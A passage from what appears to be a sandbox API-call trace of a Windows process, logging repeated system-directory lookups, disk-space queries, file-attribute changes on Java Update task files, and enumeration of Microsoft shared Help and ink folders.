uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.931] CoTaskMemFree (pv=0x508980) [0112.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.939] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.939] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.939] CoTaskMemFree (pv=0x508980) [0112.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.940] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.940] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.940] CoTaskMemFree (pv=0x508980) [0112.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.941] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.941] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.941] CoTaskMemFree (pv=0x508980) [0112.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.942] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.942] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.942] CoTaskMemFree (pv=0x508980) [0112.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.943] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.943] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.943] CoTaskMemFree (pv=0x508980) [0112.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.943] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.943] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.943] CoTaskMemFree (pv=0x508980) [0112.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.944] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.944] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.944] CoTaskMemFree (pv=0x508980) [0112.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.944] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.944] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.944] CoTaskMemFree (pv=0x508980) [0112.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.945] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.945] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.945] CoTaskMemFree (pv=0x508980) [0112.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.946] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.946] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.946] CoTaskMemFree (pv=0x508980) [0112.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.947] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.947] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.947] CoTaskMemFree (pv=0x508980) [0112.948] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.948] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.948] CoTaskMemFree (pv=0x508980) [0112.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.948] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.948] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.948] CoTaskMemFree (pv=0x508980) [0112.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.949] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.950] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.950] CoTaskMemFree (pv=0x508980) [0112.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.950] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.950] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.950] CoTaskMemFree (pv=0x508980) [0112.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.951] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.951] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.951] CoTaskMemFree (pv=0x508980) [0112.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.951] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.951] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.951] CoTaskMemFree (pv=0x508980) [0112.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.952] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.952] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.952] CoTaskMemFree (pv=0x508980) [0112.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.955] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0112.959] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task.xml", dwFileAttributes=0x80) returned 1 [0112.961] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0112.964] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\task64.xml", dwFileAttributes=0x80) returned 1 [0112.967] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.967] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.967] CoTaskMemFree (pv=0x508980) [0112.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.968] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.968] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.968] CoTaskMemFree (pv=0x508980) [0112.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.968] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.969] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.969] CoTaskMemFree (pv=0x508980) [0112.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.972] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.972] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.972] CoTaskMemFree (pv=0x508980) [0112.972] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.974] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.974] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.974] CoTaskMemFree (pv=0x508980) [0112.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.975] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.975] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.975] CoTaskMemFree (pv=0x508980) [0112.975] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.977] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.977] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.978] CoTaskMemFree (pv=0x508980) [0112.978] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.978] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0112.979] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\", lpFilePart=0x0) returned 0x3f [0112.979] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0112.980] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.980] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.980] CoTaskMemFree (pv=0x508980) [0112.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.980] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0112.981] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0112.981] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.982] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.982] CoTaskMemFree (pv=0x508980) [0112.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.982] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0112.983] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1041\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0112.984] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.984] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.984] CoTaskMemFree (pv=0x508980) [0112.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.984] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\", lpFilePart=0x0) returned 0x3f [0112.984] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0112.985] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0112.985] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.985] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.985] CoTaskMemFree (pv=0x508980) [0112.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.986] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0112.987] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0112.987] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.987] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.987] CoTaskMemFree (pv=0x508980) [0112.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.988] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0112.988] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0112.989] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.989] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.989] CoTaskMemFree (pv=0x508980) [0112.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.989] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed5e6b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0112.990] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\", nBufferLength=0x105, lpBuffer=0x2aec80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\", lpFilePart=0x0) returned 0x3f [0112.990] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed5e6b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0112.990] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.990] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.991] CoTaskMemFree (pv=0x508980) [0112.991] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.991] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0112.991] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\*", lpFindFileData=0x2aeecc | out: lpFindFileData=0x2aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0112.992] CoTaskMemAlloc (cb=0x20c) returned 0x508980 [0112.992] GetSystemDirectoryW (in: lpBuffer=0x508980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0112.992] CoTaskMemFree (pv=0x508980) [0112.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0112.992] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa21d9876, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa21d9876, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0112.996] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkObj.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkObj.dll", lpFilePart=0x0) returned 0x43 [0112.997] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\journal.dll", 